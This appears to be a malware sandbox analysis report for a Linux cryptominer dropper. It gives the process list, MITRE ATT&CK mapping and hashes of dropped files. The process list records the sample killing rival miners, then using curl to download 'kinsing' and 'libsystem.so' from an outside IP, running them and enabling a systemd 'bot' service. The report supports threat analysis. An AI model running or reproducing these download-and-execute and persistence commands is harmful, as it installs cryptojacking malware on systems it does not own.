- /usr/bin/pkill
  pkill -f kthreaddo
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1457
- /usr/bin/pkill
  pkill -f donkey
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1458
- /usr/bin/pkill
  pkill -f sysupdater
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1461
- /usr/bin/pkill
  pkill -f php-update.service
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1462
- /usr/bin/pkill
  pkill -f update-setup
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1463
- /bin/grep
  grep :1414
  2⤵
  PID:1465
- /bin/grep
  grep -v -
  2⤵
  PID:1468
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1466
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1467
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1469
- /bin/grep
  grep rtw88_pcied
  2⤵
  PID:1471
- /bin/ps
  ps ax
  2⤵
  - Reads CPU attributes
  PID:1470
- /bin/grep
  grep -v grep
  2⤵
  PID:1472
- /usr/bin/awk
  awk "{print \$1}"
  2⤵
  PID:1473
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1474
- /bin/ps
  ps ax
  2⤵
  - Reads CPU attributes
  PID:1475
- /bin/grep
  grep stratum
  2⤵
  PID:1476
- /bin/grep
  grep -v grep
  2⤵
  PID:1477
- /usr/bin/awk
  awk "{print \$1}"
  2⤵
  PID:1478
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1479
- /bin/grep
  grep Sofia
  2⤵
  PID:1481
- /bin/ps
  ps ax
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1480
- /bin/grep
  grep -v grep
  2⤵
  PID:1482
- /usr/bin/awk
  awk "{print \$1}"
  2⤵
  PID:1483
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1484
- /usr/bin/pkill
  pkill -f Sofia
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1485
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1490
- /bin/grep
  grep -v grep
  2⤵
  PID:1488
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1489
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1486
- /bin/grep
  grep tracepath
  2⤵
  PID:1487
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1491
- /bin/grep
  grep /dot
  2⤵
  PID:1492
- /bin/grep
  grep -v grep
  2⤵
  PID:1493
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1494
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1495
- /bin/grep
  grep "php-fpm pool www"
  2⤵
  PID:1497
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1496
- /bin/grep
  grep -v grep
  2⤵
  PID:1498
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1499
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1500
- /bin/grep
  grep "Cli start accept"
  2⤵
  PID:1502
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1501
- /bin/grep
  grep -v grep
  2⤵
  PID:1503
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1504
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1505
- /bin/grep
  grep "bash -k"
  2⤵
  PID:1507
- /bin/grep
  grep -v grep
  2⤵
  PID:1508
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1506
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1509
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1510
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1511
- /bin/grep
  grep perfctl
  2⤵
  PID:1512
- /bin/grep
  grep -v grep
  2⤵
  PID:1513
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1515
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1514
- /usr/bin/pkill
  pkill -f hezb
  2⤵
  - Reads CPU attributes
  PID:1516
- /usr/bin/pkill
  pkill -f /tmp/.out
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1517
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1518
- /bin/grep
  grep -v grep
  2⤵
  PID:1520
- /bin/grep
  grep ./ll1
  2⤵
  PID:1519
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1521
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1522
- /bin/grep
  grep agetty
  2⤵
  PID:1524
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1523
- /bin/grep
  grep -v grep
  2⤵
  PID:1525
- /usr/bin/awk
  awk "{if(\$3>80.0) print \$2}"
  2⤵
  PID:1526
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1527
- /usr/bin/pkill
  pkill -f 42.112.28.216
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1528
- /bin/grep
  grep 207.38.87.6
  2⤵
  PID:1530
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1531
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1532
- /bin/grep
  grep -v -
  2⤵
  PID:1533
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1534
- /bin/grep
  grep 23.94.214.119
  2⤵
  PID:1536
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1537
- /bin/grep
  grep -v -
  2⤵
  PID:1539
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1538
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1540
- /bin/grep
  grep 127.0.0.1:52018
  2⤵
  PID:1542
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1543
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1544
- /bin/grep
  grep -v -
  2⤵
  PID:1545
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1546
- /bin/grep
  grep 34.81.218.76:9486
  2⤵
  PID:1548
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1549
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1550
- /bin/grep
  grep -v -
  2⤵
  PID:1551
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1552
- /bin/grep
  grep 42.112.28.216:9486
  2⤵
  PID:1554
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1555
- /bin/grep
  grep -v -
  2⤵
  PID:1557
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1556
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1558
- /usr/bin/pkill
  pkill -f .git/kthreaddw
  2⤵
  - Reads CPU attributes
  PID:1559
- /usr/bin/pkill
  pkill -f 80.211.206.105
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1560
- /usr/bin/pkill
  pkill -f 207.38.87.6
  2⤵
  - Reads CPU attributes
  PID:1561
- /usr/bin/pkill
  pkill -f p8444
  2⤵
  - Reads CPU attributes
  PID:1562
- /usr/bin/pkill
  pkill -f supportxmr
  2⤵
  - Reads CPU attributes
  PID:1563
- /usr/bin/pkill
  pkill -f monero
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1564
- /usr/bin/pkill
  pkill -f kthreaddi
  2⤵
  - Reads CPU attributes
  PID:1565
- /usr/bin/pkill
  pkill -f srv00
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1566
- /usr/bin/pkill
  pkill -f /tmp/.javae/javae
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1567
- /usr/bin/pkill
  pkill -f .javae
  2⤵
  - Reads CPU attributes
  PID:1568
- /usr/bin/pkill
  pkill -f .syna
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1569
- /usr/bin/pkill
  pkill -f xmm
  2⤵
  - Reads CPU attributes
  PID:1570
- /usr/bin/pkill
  pkill -f solr.sh
  2⤵
  - Reads CPU attributes
  PID:1571
- /usr/bin/pkill
  pkill -f /tmp/.solr/solrd
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1572
- /usr/bin/pkill
  pkill -f /tmp/javac
  2⤵
  - Reads CPU attributes
  PID:1573
- /usr/bin/pkill
  pkill -f /tmp/.go.sh
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1574
- /usr/bin/pkill
  pkill -f /tmp/.x/agetty
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1575
- /usr/bin/pkill
  pkill -f /tmp/.x/kworker
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1576
- /usr/bin/pkill
  pkill -f c3pool
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1577
- /usr/bin/pkill
  pkill -f /tmp/.X11-unix/gitag-ssh
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1578
- /usr/bin/pkill
  pkill -f /tmp/1
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1579
- /usr/bin/pkill
  pkill -f /tmp/okk.sh
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1580
- /usr/bin/pkill
  pkill -f /tmp/gitaly
  2⤵
  - Reads CPU attributes
  PID:1581
- /usr/bin/pkill
  pkill -f /tmp/.x/kworker
  2⤵
  - Reads runtime system information
  PID:1582
- /usr/bin/pkill
  pkill -f 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFB
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1583
- /usr/bin/pkill
  pkill -f /tmp/.X11-unix/supervise
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1584
- /usr/bin/pkill
  pkill -f /tmp/.ssh/redis.sh
  2⤵
  - Reads CPU attributes
  PID:1585
- /bin/grep
  grep ./udp
  2⤵
  PID:1587
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1586
- /bin/grep
  grep -v grep
  2⤵
  PID:1588
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1589
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1590
- /bin/sed
  sed -i "s/^0//" /tmp/.X11-unix/01
  2⤵
  - Attempts to change immutable files
  PID:1591
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1593
- /bin/cat
  cat /tmp/.X11-unix/01
  2⤵
  PID:1592
- /bin/sed
  sed -i "s/^0//" /tmp/.X11-unix/11
  2⤵
  - Attempts to change immutable files
  PID:1594
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1596
- /bin/cat
  cat /tmp/.X11-unix/11
  2⤵
  PID:1595
- /bin/sed
  sed -i "s/^0//" /tmp/.X11-unix/22
  2⤵
  - Attempts to change immutable files
  PID:1597
- /bin/cat
  cat /tmp/.X11-unix/22
  2⤵
  PID:1598
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1599
- /bin/sed
  sed -i "s/^0//" /tmp/.systemd.1
  2⤵
  - Attempts to change immutable files
  PID:1600
- /bin/cat
  cat /tmp/.systemd.1
  2⤵
  PID:1601
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1602
- /bin/sed
  sed -i "s/^0//" /tmp/.systemd.2
  2⤵
  - Attempts to change immutable files
  PID:1603
- /bin/cat
  cat /tmp/.systemd.2
  2⤵
  PID:1604
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1605
- /bin/sed
  sed -i "s/^0//" /tmp/.systemd.3
  2⤵
  - Attempts to change immutable files
  PID:1606
- /bin/cat
  cat /tmp/.systemd.3
  2⤵
  PID:1607
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1608
- /bin/cat
  cat /tmp/.systemd.1
  2⤵
  PID:1609
- /bin/cat
  cat /tmp/.systemd.2
  2⤵
  PID:1610
- /bin/cat
  cat /tmp/.systemd.3
  2⤵
  PID:1611
- /bin/sed
  sed -i "s/^0//" /tmp/.pg_stat.0
  2⤵
  - Attempts to change immutable files
  PID:1612
- /bin/cat
  cat /tmp/.pg_stat.0
  2⤵
  PID:1613
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1614
- /bin/sed
  sed -i "s/^0//" /tmp/.pg_stat.1
  2⤵
  - Attempts to change immutable files
  PID:1615
- /bin/cat
  cat /tmp/.pg_stat.1
  2⤵
  PID:1616
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1617
- /bin/sed
  sed -i "s/^0//" /data/./oka.pid
  2⤵
  - Attempts to change immutable files
  PID:1618
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1620
- /bin/cat
  cat /data/./oka.pid
  2⤵
  PID:1619
- /bin/sed
  sed -i "s/^0//" /tmp/.ICE-unix/d
  2⤵
  - Attempts to change immutable files
  PID:1621
- /bin/cat
  cat /tmp/.ICE-unix/d
  2⤵
  PID:1622
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1623
- /bin/sed
  sed -i "s/^0//" /tmp/.ICE-unix/m
  2⤵
  - Attempts to change immutable files
  PID:1624
- /bin/cat
  cat /tmp/.ICE-unix/m
  2⤵
  PID:1625
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1626
- /usr/bin/pkill
  pkill -f zsvc
  2⤵
  - Reads CPU attributes
  PID:1627
- /usr/bin/pkill
  pkill -f pdefenderd
  2⤵
  - Reads CPU attributes
  PID:1628
- /usr/bin/pkill
  pkill -f updatecheckerd
  2⤵
  - Reads CPU attributes
  PID:1629
- /usr/bin/pkill
  pkill -f cruner
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1630
- /usr/bin/pkill
  pkill -f dbused
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1631
- /usr/bin/pkill
  pkill -f bashirc
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1632
- /usr/bin/pkill
  pkill -f meminitsrv
  2⤵
  - Reads CPU attributes
  PID:1633
- /bin/grep
  grep ./oka
  2⤵
  PID:1635
- /bin/grep
  grep -v grep
  2⤵
  PID:1636
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1634
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1637
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1638
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1639
- /bin/grep
  grep "postgres: autovacum"
  2⤵
  PID:1640
- /bin/grep
  grep -v grep
  2⤵
  PID:1641
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1642
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1643
- /usr/bin/awk
  awk "length(\$1) == 8"
  2⤵
  PID:1645
- /bin/ps
  ps ax -o "command,pid" -www
  2⤵
  - Reads CPU attributes
  PID:1644
- /bin/grep
  grep -v bin
  2⤵
  PID:1646
- /bin/grep
  grep -v "\\["
  2⤵
  PID:1647
- /bin/grep
  grep -v "("
  2⤵
  PID:1648
- /bin/grep
  grep -v php-fpm
  2⤵
  PID:1649
- /bin/grep
  grep -v proxymap
  2⤵
  PID:1650
- /bin/grep
  grep -v postgres
  2⤵
  PID:1651
- /bin/grep
  grep -v postgrey
  2⤵
  PID:1652
- /bin/grep
  grep -v kinsing
  2⤵
  PID:1653
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1654
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1655
- /bin/ps
  ps ax -o "command,pid" -www
  2⤵
  - Reads runtime system information
  PID:1656
- /usr/bin/awk
  awk "length(\$1) == 16"
  2⤵
  PID:1657
- /bin/grep
  grep -v "\\["
  2⤵
  PID:1659
- /bin/grep
  grep -v bin
  2⤵
  PID:1658
- /bin/grep
  grep -v "("
  2⤵
  PID:1660
- /bin/grep
  grep -v php-fpm
  2⤵
  PID:1661
- /bin/grep
  grep -v proxymap
  2⤵
  PID:1662
- /bin/grep
  grep -v postgres
  2⤵
  PID:1663
- /bin/grep
  grep -v postgrey
  2⤵
  PID:1664
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1665
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1666
- /usr/bin/awk
  awk "length(\$5) == 8"
  2⤵
  PID:1668
- /bin/grep
  grep -v bin
  2⤵
  PID:1669
- /bin/ps
  ps ax
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1667
- /bin/grep
  grep -v "\\["
  2⤵
  PID:1670
- /bin/grep
  grep -v "("
  2⤵
  PID:1671
- /bin/grep
  grep -v php-fpm
  2⤵
  PID:1672
- /bin/grep
  grep -v proxymap
  2⤵
  PID:1673
- /bin/grep
  grep -v postgres
  2⤵
  PID:1674
- /bin/grep
  grep -v postgrey
  2⤵
  PID:1675
- /usr/bin/awk
  awk "{print \$1}"
  2⤵
  PID:1676
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1677
- /bin/grep
  grep -v grep
  2⤵
  PID:1679
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1678
- /bin/grep
  grep /tmp/sscks
  2⤵
  PID:1680
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1681
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1682
- /usr/bin/awk
  awk "{ print \$1 }"
  2⤵
  PID:1686
- /usr/bin/md5sum
  md5sum /etc/data/kinsing
  2⤵
  PID:1685
- /bin/rm
  rm -rf /etc/data/kinsing
  2⤵
  PID:1687
- /bin/chmod
  chmod 777 /etc/data/kinsing
  2⤵
  - File and Directory Permissions Modification
  PID:1688
- /usr/bin/curl
  curl -o /etc/data/kinsing http://194.38.22.120/kinsing
  2⤵
  PID:1689
- /bin/chmod
  chmod +x /etc/data/kinsing
  2⤵
  - File and Directory Permissions Modification
  PID:1691
- /usr/bin/md5sum
  md5sum /etc/data/kinsing
  2⤵
  PID:1694
- /usr/bin/awk
  awk "{ print \$1 }"
  2⤵
  PID:1695
- /usr/bin/md5sum
  md5sum /etc/data/libsystem.so
  2⤵
  PID:1698
- /usr/bin/awk
  awk "{ print \$1 }"
  2⤵
  PID:1699
- /bin/chmod
  chmod 777 /etc/data/libsystem.so
  2⤵
  - File and Directory Permissions Modification
  PID:1700
- /usr/bin/curl
  curl -o /etc/data/libsystem.so http://194.38.22.120/libsystem.so
  2⤵
  PID:1701
- /bin/chmod
  chmod +x /etc/data/libsystem.so
  2⤵
  - File and Directory Permissions Modification
  PID:1702
- /usr/bin/md5sum
  md5sum /etc/data/libsystem.so
  2⤵
  PID:1705
- /usr/bin/awk
  awk "{ print \$1 }"
  2⤵
  PID:1706
- /bin/chmod
  chmod 777 /etc/data/libsystem.so
  2⤵
  - File and Directory Permissions Modification
  PID:1707
- /usr/bin/curl
  curl -o /etc/data/libsystem.so http://194.38.22.120/libsystem.so
  2⤵
  PID:1708
- /bin/chmod
  chmod +x /etc/data/libsystem.so
  2⤵
  - File and Directory Permissions Modification
  PID:1709
- /usr/bin/md5sum
  md5sum /etc/data/libsystem.so
  2⤵
  PID:1712
- /usr/bin/awk
  awk "{ print \$1 }"
  2⤵
  PID:1713
- /bin/rm
  rm -rf /tmp/kdevtmpfsi
  2⤵
  PID:1714
- /bin/chmod
  chmod 777 /etc/data/kinsing
  2⤵
  - File and Directory Permissions Modification
  PID:1715
- /bin/chmod
  chmod +x /etc/data/kinsing
  2⤵
  - File and Directory Permissions Modification
  PID:1716
- /etc/data/kinsing
  /etc/data/kinsing
  2⤵
  PID:1717
- /usr/bin/id
  id -u
  2⤵
  PID:1719
- /bin/systemctl
  systemctl enable bot
  2⤵
  - Enumerates kernel/hardware configuration
  PID:1720

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Shared Modules

T1129

Persistence

Boot or Logon Autostart Execution

T1547

XDG Autostart Entries

T1547.013

Create or Modify System Process

T1543

Systemd Service

T1543.002

Hijack Execution Flow

T1574

Dynamic Linker Hijacking

T1574.006

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

Boot or Logon Autostart Execution

T1547

XDG Autostart Entries

T1547.013

Create or Modify System Process

T1543

Systemd Service

T1543.002

Hijack Execution Flow

T1574

Dynamic Linker Hijacking

T1574.006

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Hijack Execution Flow

T1574

Dynamic Linker Hijacking

T1574.006

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

Discovery

Process Discovery

T1057

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/etc/data/kinsing

Filesize
5.7MB

MD5
b3039abf2ad5202f4a9363b418002351

SHA1
0ceb8ffb0be23b808b534d744440f4367e17b9c5

SHA256
787e2c94e6d9ce5ec01f5cbe9ee2518431eca8523155526d6dc85934c9c5787c

SHA512
8b1a1003a021d0f69b9295f496bf550932ce85b096ca7057632756348da1354c2b104ff36e901b27def030b79749c8fc7f54163d6195e5e0cb9b357353ee654e

Download Submit
/etc/data/libsystem.so

Filesize
26KB

MD5
ccef46c7edf9131ccffc47bd69eb743b

SHA1
38c56b5e1489092b80c9908f04379e5a16876f01

SHA256
c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a

SHA512
da452f1022e7ba6e5b958d39d3e5d0418339d55bf8b2ad8cfc9e25a43ad61b6e992df9df97b75d64a22a5b8dde35308f4934d7b0c591bb460526bf24ead808cc

Download Submit
/lib/systemd/system/bot.service

Filesize
198B

MD5
40d800480894888e7b6abd3c91625348

SHA1
dc97c4c45b5fa7c51572e47a36bf63f5ba908e08

SHA256
90a16951a40101be4cb3e2c55c0a8de710e0e744e7cae003483fa3f825ea67f4

SHA512
634f058551676a3d2b8ef126d975da66a8735c089aa4dcec8bd9cc5cd344fde66c445bd9677349fefefc6b7b2e80ad0cb95a585ad5d6f9b7ca7aa6f026ce4857

Download Submit
/var/mail/user

Filesize
843B

MD5
0a0fc96b5a1c532ebfa4acbc0330d45f

SHA1
f1c4b2e2717f5ed6b9cb4094b23ace7fb46a8e84

SHA256
9a3d9b9f60209ec8f84e41977977d664188775ead935500cadaf474599aac02c

SHA512
2037c26862a2f927bd56c2d8c00ac424ed0e8e95d938a69b7f090466595e7e63ef8b03673901655d587df75bc0d5544b73c51f00123ab60dcdcf94cae84f336d

Download Submit
/var/mail/user

Filesize
1KB

MD5
f0dff0e97c52897599313be3c6edf389

SHA1
26578f093dad7d475a68a48b6d06dc88b55a2d50

SHA256
f4dbfbc1a5b9dc6a6dd198e79c85230242925c3a0efb02423929c052bcd0d027

SHA512
85b082fc973c7e0315d0fe1a92ed6a6420102087df61c2bb505ba2a8f104a28445d862d39ccd0c7a0130a14d2c9382ffb2b3d70c08c41fc611eda279fad864d7

Download Submit
/var/spool/exim4/input/1tmNfK-0000ND-O5-D

Filesize
128B

MD5
f2ba008486e0926dba4097629f331746

SHA1
9da66de2f7e49dd63da2ae62d1e01c0fb076f4dc

SHA256
72f8c3250902b78569cd8911406d750fffff7496c21f63d8337cedaaf60da512

SHA512
d65dedc4a45b5d576538bf586764aa892d6dabad9ee43d9c1ab2c0162f2e7695a9d6915ede3399607a1d3932ee5e0d10528538bf48fbe17312240baab4858807

Download Submit
/var/spool/exim4/input/1tmNfK-0000NG-O3-D

Filesize
146B

MD5
ca1bc3754b5d06a7cb4a756091529142

SHA1
971f338140a717838828434ad57e5eea2c6cf0ff

SHA256
df09727748899e9bdda4cbb4af5fdca4405c0b7f317a7ae77d0e403541b29c0f

SHA512
5d90f82c93e74865da78f8852b0e820443c96de74dbaf2f3dc01e12136e34989497d26ec19e9f83bc0c91f6f0df3e4cb8fece59e69d0e3ce5c0cb9ec136729cc

Download Submit
/var/spool/exim4/input/1tmNfK-0000NG-O3-J

Filesize
34B

MD5
d7d96d63d643a4ce3e408eba7dfcedc5

SHA1
c53607f95c5c57beafc1d8266646797a035f76ea

SHA256
21db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159

SHA512
703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3

Download Submit
/var/spool/exim4/input/hdr.1442

Filesize
915B

MD5
14ec4ed1026c854d6089167d3b7fec61

SHA1
f703ed00f8ff9523d40cacb616f89c3004239db5

SHA256
48b393424bcf956426c57acfa6e95205ddcd81730f16d9beb62a4fa9dc681e00

SHA512
81bb221a4f3e5293251a2044162708d1fda33127f91f3471b78fac663c09bcc704dcbea0c55ce3c330f149aee23f043ede80d4d0062c7003212b21e94e19b87d

Download Submit
/var/spool/exim4/msglog/1tmNfK-0000ND-O5

Filesize
288B

MD5
46aa1464642af3fd9633cca37af2b7d6

SHA1
8d183ac50d58f514012c681ff7e4aada272832f7

SHA256
651fe795dbfec8f41673aa5d6334e832372470e85fc827c00ab673dc03e68991

SHA512
6cd3f2ceea48d80a793085e24fdf2b0a4e85f0b79bdeb1374437233be5fe9b0b28c0f6d7758b71c3be5123c8b0daa4ed8ef698405349ddd6f042a0ead773fe4b

Download Submit
/var/spool/exim4/msglog/1tmNfK-0000ND-O5

Filesize
89B

MD5
c4dc7a6d7a0ab358d3449bcce55e8dcb

SHA1
9cfc7afabaa338b22ef7988cebb21bc3c1a923d3

SHA256
5f1d7a10384647eccdbc38336bd668bf8c49dbadfc3f51260c62aa36954649c0

SHA512
1df832cf4b2f1f079d41a021f12e14ad333472842c650acfbab3f588cf678d028efd4f017f92b764e2a0c97f72c3838b20ffebc8c0c026f72d5380809b9c69bd

Download Submit
/var/spool/exim4/msglog/1tmNfK-0000NG-O3

Filesize
288B

MD5
40aefc9e08424404b410ca87f0f81408

SHA1
a1b69ac3c1af7e5aad230a69ebe16eabfb3df4ce

SHA256
853c57158d4e21029d984dca6cb9abbb98af85b5d87ce2ca40f6be7fbec58c55

SHA512
b28a3c38b45904ecf77578e562e0a30c0e723bb21bb9515831b155059188dfbfb4150fb9cfa3741cc3266849ad40b5a6e374015a9123c6aebc79470b47d8d6dc

Download Submit
/var/spool/exim4/msglog/1tmNfK-0000NG-O3

Filesize
89B

MD5
003a36a590ddeb1c3e09cfca4e0ac72e

SHA1
67c9cc964c511b2c4067b1d9ae1bbfa068fe9c3d

SHA256
2cf5cc603677b1af87794420ff9827ea0149604747d987a4233b7921024e9bf6

SHA512
c23401e12cf09a5dcf09b0b01b378ee1a1ecc09e9907bbc816b48b78cded66b0cfbabe5ac07e60e29c6cf43ea9d7ac5a1f93037f4e2da6adbb0c9e2c77152638

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads